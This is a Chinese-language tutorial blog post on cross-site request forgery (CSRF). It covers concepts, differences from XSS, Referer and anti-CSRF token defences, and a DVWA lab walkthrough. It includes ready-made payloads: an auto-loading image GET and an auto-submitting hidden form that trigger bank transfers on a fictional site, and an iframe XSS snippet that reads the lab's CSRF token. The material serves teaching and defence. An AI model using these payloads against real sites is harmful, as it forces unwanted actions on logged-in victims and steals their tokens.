系列2:10、CSRF相关

csrf漏洞

1、概念

跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。

2、个人理解

简单说:攻击者盗用了你的身份,以你的名义发送恶意请求。
可以看出,要完成一次CSRF攻击,受害者必须依次完成两个步骤:
1.登录受信任网站A,并在本地生成Cookie。
2.在不登出A的情况下,访问危险网站B。

3、实现流程

在这里插入图片描述

4、与XSS区别

在这里插入图片描述
1、CSRF会有一个第三方的网站
2、XSS可以获取到明文的cookie
3、XSS需要将代码注入到攻击的服务器

5、CSRF payload

1)通过图片的img src属性,自动加载,发起GET请求

<img
src="http://superbank.com/bank/transfer.php?nameid=2002&amount=1000" width="O" height="0">

2)构建一个超链接,用户点击以后,发起GET请求

<a
href="http://superbank.com/transfer.php?amount=1000&to=jiangang" taget="_blank" >
小姐姐在线视频聊天!!
<a/>

3)构建一个隐藏表单,用户访问,自动提交,发起POST请求

<form action="http://superbank.com/withdraw" method=POST>
  <input type="hidden" name="account" value="xiaoming" />
  <input type="hidden" name="amount" value="1000"/>
  <input type="hidden" name="to" value="jiangang"/ >
</form>
<script> document.forms[0].submit(); </script>
6、漏洞防御
(1)防御思路

我们能不能区分一个请求是来自于自己的前端页面,还是第三方的网站?
或者怎么让自己的前端页面和伪造的请求变得不一样呢?

(2)方法

1)HTTP Request Header
Referrer: 引用页;引荐;来源页面
作用:跟踪来源,比如访问统计、广告效果

Referer: https : //www.baidu.com/s?ie=utf-
8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd5a7&rsv_t=89ef
DHGeD8cmcPMIdmwOyCTnQ0%2F1LS7ydq1hJfuG6FaKWU%2BZ0S
7guOvX3rE&rug3=4&rsv_sug1=4&rsv_sug7=101&rsv_sug2=
0&rsv_btype=i&prefixsug=666&rsp=5&ir
#可以看出以上为从百度来访问的
(3)DVWA靶场说明

1)低级
通过url即可改变密码
在这里插入图片描述
2)中级
查看源代码,发现加入了HTTP_REFERER验证,在本例子中 http://localhost/DVWA-master/vulnerabilities/csrf/ ,即只要没有localhost 就会进行拦截
在这里插入图片描述
漏洞利用:如果在其他服务器,可以进行抓包改变REFERER,将正确的REFERER复制利用

3)高难度
查看源码发现增加了新的HTTP_USER_TOKEN验证,此方法思想为:在请求中加入一些随机字段((第三方不知道也猜不出来),让第三方网站无法伪造请求

在这里插入图片描述
此方法防御步骤:
1、用户使用用户名密码登录,服务端下发一个随机的token字段给客户端,并且服务端把这个字段保存在session中。
2、客户端把这个token保存起来,放到隐藏字段。
3、用户在登陆状态下,在之后访问的时候,都要携带这个token字段。
4、服务端从session中拿出token值进行对比如果一致,说明请求合法。
5、用户退出,session销毁,token失效。

但此时,如果该网站有xss漏洞,可以结合xss漏洞,拿到token值

<iframe src="../csrf" onload=alert(frames[0].document.getElementsByName('user_token')[0].value)>

在这里插入图片描述

(4)如今的防御措施

各种人机验证,手机验证等

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值